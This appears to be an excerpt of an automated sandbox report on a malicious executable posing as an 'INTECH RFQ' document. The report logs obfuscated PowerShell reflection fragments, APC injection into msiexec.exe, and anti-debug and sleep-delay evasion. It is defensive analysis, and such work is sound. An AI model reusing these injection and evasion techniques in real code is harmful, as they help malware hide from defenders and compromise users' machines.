              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Centralskolernes $Counterfeiters $Acomia), (Noritic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Padina225 = [AppDomain]::CurrentDomain.GetAssemblies()$
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Enduringness)), $Printeres).DefineDynamicModule($strossers, $false).DefineType($Bylandmandens, $Umbellulidae, [System.MulticastDelegat
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_0040600B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040600B

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5996Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3651Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5796Thread sleep time: -40000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_00405FE4 FindFirstFileA,FindClose,0_2_00405FE4
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWindows\system32\en-US\mswsock.dll.muipv
              Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeAPI call chain: ExitProcess graph end nodegraph_0-3494
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeCode function: 0_2_0040600B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040600B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
